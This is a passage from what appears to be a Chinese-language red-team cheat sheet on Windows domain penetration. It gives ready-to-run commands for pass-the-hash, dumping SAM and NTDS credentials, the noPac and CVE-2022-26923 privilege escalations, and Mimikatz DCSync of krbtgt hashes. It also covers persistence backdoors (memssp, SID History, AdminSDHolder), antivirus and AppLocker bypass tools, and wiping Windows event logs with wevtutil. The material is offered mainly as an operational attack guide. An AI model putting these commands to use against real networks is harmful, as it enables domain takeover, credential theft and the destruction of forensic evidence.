59958639cbdd4523de5d42b01adb0e256e0d39aef14c8eef31f4c078862109f253bbb7b3817ab123d013856c028fa4993f5f5b9a830a3a98d87483b29df3fb55082a1f464b19220a2c04f6605d2d321a04afbb551f8f19a13d399f9f5af2aa23c5b76b49001033516fefd90cb0348256e8282b22cbf9e70d82a8b8d2916d578246e288af3af727533d36ad8950fe1c513771377d98a947c4a8eae2b581a74b6687a2e533b7e89e8d03c2e6c2123d519489869a6e33d3a8884be33107060b62e2852502261f48c097ddb68750cc55b7688cc951441cf02989a307f55c008e978edbaf31766d17b53505016c7580cb480b</span></span></code></pre></div><p><img src="https://blogpics-1251691280.file.myqcloud.com/imgs/20200916190457.png"></p><p>恢复方法2<br>通过wmic, pass the hash 拿到域控制器中的本地管理员权限(域管)</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8adfc85c3490040e942ae1e6c68f645e test.local/Administrator@10.211.55.38</span></span></code></pre></div><p>然后分别执行,拷贝本机中SAM数据库到本地</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">- reg save HKLM\SYSTEM system.save</span></span><span class="line"><span style="color: #babed8">- reg save HKLM\SAM sam.save</span></span><span class="line"><span style="color: #babed8">- reg save HKLM\SECURITY security.save</span></span><span class="line"><span style="color: #babed8">- get system.save</span></span><span class="line"><span style="color: #babed8">- get sam.save</span></span><span class="line"><span style="color: #babed8">- get security.save</span></span><span class="line"><span style="color: #babed8">- del /f system.save</span></span><span class="line"><span style="color: #babed8">- del /f sam.save</span></span><span class="line"><span style="color: #babed8">- del /f security.save</span></span></code></pre></div><p>提取明文hash</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">secretsdump.py -sam sam.save -system system.save -security security.save LOCAL</span></span></code></pre></div><p>然后恢复。<br> </p><h5 id="noPac"><a href="#noPac" class="headerlink" title="noPac"></a>noPac</h5><p>漏洞分析:<a href="https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html">CVE-2021-42287/CVE-2021-42278 Weaponisation</a></p><p>Exploit:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"># Create Machine Account</span></span><span class="line"><span style="color: #babed8">New-MachineAccount -MachineAccount TestSPN -Domain internal.zeroday.lab -DomainController idc1.internal.zeroday.lab -Verbose</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Clear SPNs</span></span><span class="line"><span style="color: #babed8">Set-DomainObject "CN=TestSPN,CN=Computers,DC=internal,DC=zeroday,DC=lab" -Clear 'serviceprincipalname' -Verbose</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Change Machine Account samaccountname</span></span><span class="line"><span style="color: #babed8">Set-MachineAccountAttribute -MachineAccount TestSPN -Value "IDC1" -Attribute samaccountname -Verbose</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Request TGT</span></span><span class="line"><span style="color: #babed8">.\Rubeus.exe asktgt /user:IDC1 /password:Password1 /domain:internal.zeroday.lab /dc:idc1.internal.zeroday.lab /nowrap</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Change Machine Account samaccountname</span></span><span class="line"><span style="color: #babed8">Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN" -Attribute samaccountname -Verbose</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># Request S4U2self</span></span><span class="line"><span style="color: #babed8">.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:idc1.internal.zeroday.lab /self /altservice:LDAP/IDC1.internal.zeroday.lab /ptt /ticket:[TGT]</span></span><span class="line"><span style="color: #babed8"></span></span></code></pre></div><p>一键利用:<a href="https://github.com/cube0x0/noPac">noPac</a></p><h5 id="ADCS"><a href="#ADCS" class="headerlink" title="ADCS"></a>ADCS</h5><p>利用ADCS中错误配置的模板进行域提权,详细可参考:<a href="https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf">Certified_Pre-Owned</a></p><p>可利用工具:</p><ul><li><a href="https://github.com/GhostPack/Certify">Certify</a></li><li><a href="https://github.com/ly4k/Certipy">Certipy</a></li><li><a href="https://github.com/dirkjanm/PKINITtools">PKINITtools</a></li><li><a href="https://github.com/eloypgz/certi">certi</a></li></ul><h5 id="CVE-2022-26923"><a href="#CVE-2022-26923" class="headerlink" title="CVE-2022-26923"></a>CVE-2022-26923</h5><p>前提:域内有ADCS<br>Exploit:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"># 修改可控机器DNS</span></span><span class="line"><span style="color: #babed8">python certi.py account create cgdomain.com/sanfeng:'1qazXSW@'@10.211.55.200 -dc-ip 10.211.55.200 -user testvul -dns dc2008.cgdomain.com</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># 请求证书</span></span><span class="line"><span style="color: #babed8">python certi.py req 'cgdomain.com/testvul$:NUxhMemzaP4rsPnu'@10.211.55.200 -dc-ip 10.211.55.200 -ca cgdomain-DC2008-CA -template 'Machine'</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># 获取DC hash</span></span><span class="line"><span style="color: #babed8">python certi.py auth -dc-ip 10.211.55.200 -pfx dc2008.pfx -username dc2008$</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8"># 还原机器DNS</span></span><span class="line"><span style="color: #babed8">python certi.py account update cgdomain.com/sanfeng:'1qazXSW@'@10.211.55.200 -dc-ip 10.211.55.200 -user testvul -dns testvul.hqcec.com</span></span></code></pre></div><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>注:此环境的ADCS与DC为同一台机器。真实环境需要根据实际情况进行参数调整。</p></blockquote><h4 id="获取AD哈希"><a href="#获取AD哈希" class="headerlink" title="获取AD哈希"></a>获取AD哈希</h4><ul><li>使用VSS卷影副本 </li><li>Ntdsutil中获取NTDS.DIT文件 </li><li>PowerShell中提取NTDS.DIT –><a href="https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy">Invoke-NinaCopy </a></li><li>使用Mimikatz提取</li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">mimikatz lsadump::lsa /inject exit </span></span></code></pre></div><ul><li>使用PowerShell Mimikatz</li><li>使用Mimikatz的DCSync 远程转储Active Directory凭证<br>提取 KRBTGT用户帐户的密码数据:</li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt"exit</span></span></code></pre></div><p>管理员用户帐户提取密码数据:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit</span></span><span class="line"><span style="color: #babed8"></span></span></code></pre></div><ul><li>NTDS.dit中提取哈希<br>使用esedbexport恢复以后使用ntdsxtract提取</li></ul><h4 id="AD持久化"><a href="#AD持久化" class="headerlink" title="AD持久化"></a>AD持久化</h4><h5 id="活动目录持久性技巧"><a href="#活动目录持久性技巧" class="headerlink" title="活动目录持久性技巧"></a>活动目录持久性技巧</h5><p><a href="https://adsecurity.org/?p=1929">https://adsecurity.org/?p=1929</a><br>DS恢复模式密码维护<br>DSRM密码同步 </p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步,Windows Server 2003不支持DSRM密码同步。KB961320:<a href="https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,%E5%8F%AF%E5%8F%82%E8%80%83%EF%BC%9A[%E5%B7%A7%E7%94%A8DSRM%E5%AF%86%E7%A0%81%E5%90%8C%E6%AD%A5%E5%B0%86%E5%9F%9F%E6%8E%A7%E6%9D%83%E9%99%90%E6%8C%81%E4%B9%85%E5%8C%96](http://drops.xmd5.com/static/drops/tips-9297.html)">https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可参考:[巧用DSRM密码同步将域控权限持久化](http://drops.xmd5.com/static/drops/tips-9297.html)</a></p></blockquote><p><a href="https://www.dcshadow.com/">DCshadow </a></p><h5 id="Security-Support-Provider"><a href="#Security-Support-Provider" class="headerlink" title="Security Support Provider"></a>Security Support Provider</h5><p>简单的理解为SSP就是一个DLL,用来实现身份认证</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">privilege::debug</span></span><span class="line"><span style="color: #babed8">misc::memssp</span></span></code></pre></div><p>这样就不需要重启<code>c:/windows/system32</code>可看到新生成的文件kiwissp.log</p><h5 id="SID-History"><a href="#SID-History" class="headerlink" title="SID History"></a><a href="https://adsecurity.org/?p=1772">SID History</a></h5><p>SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator"</span></span></code></pre></div><h5 id="AdminSDHolder&SDProp"><a href="#AdminSDHolder&SDProp" class="headerlink" title="AdminSDHolder&SDProp "></a><a href="https://adsecurity.org/?p=1906">AdminSDHolder&SDProp </a></h5><p>利用AdminSDHolder&SDProp(重新)获取域管理权限 </p><h5 id="组策略"><a href="#组策略" class="headerlink" title="组策略"></a>组策略</h5><p><a href="https://adsecurity.org/?p=2716">https://adsecurity.org/?p=2716</a><br><a href="https://www.anquanke.com/post/id/86531">策略对象在持久化及横向渗透中的应用</a> </p><h5 id="Hook-PasswordChangeNotify"><a href="#Hook-PasswordChangeNotify" class="headerlink" title="Hook PasswordChangeNotify"></a>Hook PasswordChangeNotify</h5><p><a href="http://www.vuln.cn/6812">http://www.vuln.cn/6812</a></p><h5 id="Kerberoasting后门"><a href="#Kerberoasting后门" class="headerlink" title="Kerberoasting后门"></a>Kerberoasting后门</h5><p><a href="https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting">域渗透-Kerberoasting</a></p><h5 id="AdminSDHolder"><a href="#AdminSDHolder" class="headerlink" title="AdminSDHolder"></a>AdminSDHolder</h5><p><a href="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence">Backdooring AdminSDHolder for Persistence</a></p><h5 id="Delegation"><a href="#Delegation" class="headerlink" title="Delegation"></a>Delegation</h5><p><a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence">Unconstrained Domain Persistence</a></p><h5 id="黄金证书"><a href="#黄金证书" class="headerlink" title="黄金证书"></a>黄金证书</h5><p><a href="https://blog.harmj0y.net/activedirectory/certified-pre-owned/">certified-pre-owned</a></p><p>证书伪造:<br><a href="https://github.com/Ridter/pyForgeCert">pyForgeCert</a></p><h4 id="其他-1"><a href="#其他-1" class="headerlink" title="其他"></a>其他</h4><h5 id="域内主机提权"><a href="#域内主机提权" class="headerlink" title="域内主机提权"></a>域内主机提权</h5><p><a href="https://github.com/Ridter/SharpAddDomainMachine">SharpAddDomainMachine</a></p><h5 id="Exchange的利用"><a href="#Exchange的利用" class="headerlink" title="Exchange的利用"></a>Exchange的利用</h5><ul><li><a href="https://github.com/ridter/owa_info"><strong>owa_info</strong></a></li><li><a href="https://github.com/Ridter/Exchange2domain"><strong>Exchange2domain</strong></a></li><li><a href="https://github.com/WyAtu/CVE-2018-8581/"><strong>CVE-2018-8581</strong></a></li><li><a href="https://github.com/Ridter/CVE-2019-1040"><strong>CVE-2019-1040</strong></a> </li><li><a href="https://github.com/Ridter/CVE-2020-0688"><strong>CVE-2020-0688</strong></a></li><li><a href="https://github.com/Arno0x/NtlmRelayToEWS"><strong>NtlmRelayToEWS</strong></a></li><li><a href="https://github.com/3gstudent/ewsManage"><strong>ewsManage</strong></a></li><li><a href="https://github.com/h4x0r-dz/CVE-2021-26855"><strong>CVE-2021-26855</strong></a></li><li><a href="https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda"><strong>CVE-2021-28482</strong></a></li><li><a href="https://github.com/hosch3n/ProxyVulns"><strong>ProxyVulns</strong></a></li><li><a href="https://github.com/testanull/ProxyNotShell-PoC"><strong>ProxyNotShell</strong></a></li><li><a href="https://github.com/balki97/OWASSRF-CVE-2022-41082-POC"><strong>OWASSRF-ProxyNotShell</strong></a></li><li><a href="https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e"><strong>Tabshell</strong></a></li></ul><h4 id="TIPS"><a href="#TIPS" class="headerlink" title="TIPS"></a>TIPS</h4><p><a href="https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed">《域渗透——Dump Clear-Text Password after KB2871997 installed》</a></p><p><a href="http://www.vuln.cn/6812">《域渗透——Hook PasswordChangeNotify》</a> </p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>可通过Hook PasswordChangeNotify实时记录域控管理员的新密码 </p></blockquote><p><a href="http://www.liuhaihua.cn/archives/179102.html">《域渗透——Local Administrator Password Solution》 </a></p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>域渗透时要记得留意域内主机的本地管理员账号 </p></blockquote><p><a href="https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81">《域渗透——利用SYSVOL还原组策略中保存的密码》 </a></p><h4 id="相关工具"><a href="#相关工具" class="headerlink" title="相关工具"></a>相关工具</h4><ul><li><p><a href="https://github.com/BloodHoundAD/BloodHound">BloodHound </a></p></li><li><p><a href="https://github.com/byt3bl33d3r/CrackMapExec">CrackMapExec </a></p></li><li><p><a href="https://github.com/byt3bl33d3r/DeathStar">DeathStar</a> </p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>利用过程:<a href="http://www.freebuf.com/sectool/160884.html">http://www.freebuf.com/sectool/160884.html</a></p></blockquote></li></ul><h3 id="在远程系统上执行程序"><a href="#在远程系统上执行程序" class="headerlink" title="在远程系统上执行程序"></a>在远程系统上执行程序</h3><ul><li>At </li><li>Psexec </li><li>WMIC </li><li>Wmiexec </li><li>Smbexec </li><li>Powershell remoting </li><li>DCOM </li><li>Winrm (<a href="https://github.com/Hackplayers/evil-winrm">https://github.com/Hackplayers/evil-winrm</a>)</li></ul><h3 id="IOT相关"><a href="#IOT相关" class="headerlink" title="IOT相关"></a>IOT相关</h3><ul><li>1、路由器 <a href="https://github.com/reverse-shell/routersploit">routersploit </a></li><li>2、打印机 <a href="https://github.com/RUB-NDS/PRET">PRET </a></li><li>3、IOT exp <a href="https://www.exploitee.rs/">https://www.exploitee.rs/</a></li><li>4、相关<br><a href="https://www.owasp.org/index.php/OWASP_Nettacker">OWASP-Nettacker</a><br><a href="https://github.com/dark-lbp/isf">isf</a><br><a href="https://github.com/w3h/icsmaster">icsmaster</a></li></ul><h3 id="中间人"><a href="#中间人" class="headerlink" title="中间人"></a>中间人</h3><ul><li><a href="http://www.oxid.it/cain.html">Cain</a> </li><li><a href="https://github.com/Ettercap/ettercap">Ettercap</a> </li><li><a href="https://github.com/SpiderLabs/Responder">Responder</a> </li><li><a href="https://github.com/byt3bl33d3r/MITMf">MITMf</a> </li><li><a href="https://github.com/evilsocket/bettercap">3r/MITMf)</a></li></ul><h3 id="规避杀软及检测"><a href="#规避杀软及检测" class="headerlink" title="规避杀软及检测"></a>规避杀软及检测</h3><h4 id="Bypass-Applocker"><a href="#Bypass-Applocker" class="headerlink" title="Bypass Applocker"></a>Bypass Applocker</h4><p><a href="https://github.com/api0cradle/UltimateAppLockerByPassList">UltimateAppLockerByPassList </a><br><a href="https://lolbas-project.github.io/">https://lolbas-project.github.io/</a> </p><h4 id="BypassAV"><a href="#BypassAV" class="headerlink" title="BypassAV"></a>BypassAV</h4><ul><li>Empire </li><li>PEspin </li><li>Shellter </li><li>Ebowla </li><li>Veil </li><li>PowerShell </li><li>Python </li><li><a href="http://www.4hou.com/technology/9379.html">代码注入技术Process Doppelgänging </a></li><li>…</li></ul><h2 id="痕迹清理"><a href="#痕迹清理" class="headerlink" title="痕迹清理"></a>痕迹清理</h2><h3 id="Windows日志清除"><a href="#Windows日志清除" class="headerlink" title="Windows日志清除"></a><a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87">Windows日志清除</a></h3><p>获取日志分类列表:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wevtutil el >1.txt</span></span></code></pre></div><p>获取单个日志类别的统计信息:<br>eg.</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wevtutil gli "windows powershell"</span></span></code></pre></div><p>回显:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">creationTime: 2016-11-28T06:01:37.986Z</span></span><span class="line"><span style="color: #babed8">lastAccessTime: 2016-11-28T06:01:37.986Z</span></span><span class="line"><span style="color: #babed8">lastWriteTime: 2017-08-08T08:01:20.979Z</span></span><span class="line"><span style="color: #babed8">fileSize: 1118208</span></span><span class="line"><span style="color: #babed8">attributes: 32</span></span><span class="line"><span style="color: #babed8">numberOfLogRecords: 1228</span></span><span class="line"><span style="color: #babed8">oldestRecordNumber: 1</span></span></code></pre></div><p>查看指定日志的具体内容:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wevtutil qe /f:text "windows powershell"</span></span></code></pre></div><p>删除单个日志类别的所有信息:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wevtutil cl "windows powershell"</span></span></code></pre></div><h3 id="破坏Windows日志记录功能"><a href="#破坏Windows日志记录功能" class="headerlink" title="破坏Windows日志记录功能"></a>破坏Windows日志记录功能</h3><p>利用工具 </p><ul><li><a href="https://github.com/hlldz/Invoke-Phant0m">Invoke-Phant0m</a> </li><li><a href="https://github.com/3gstudent/Windwos-EventLog-Bypass">Windwos-EventLog-Bypass</a></li></ul><h3 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h3><div class="language-txt"><button title="Copy code" class="copy"></button><span 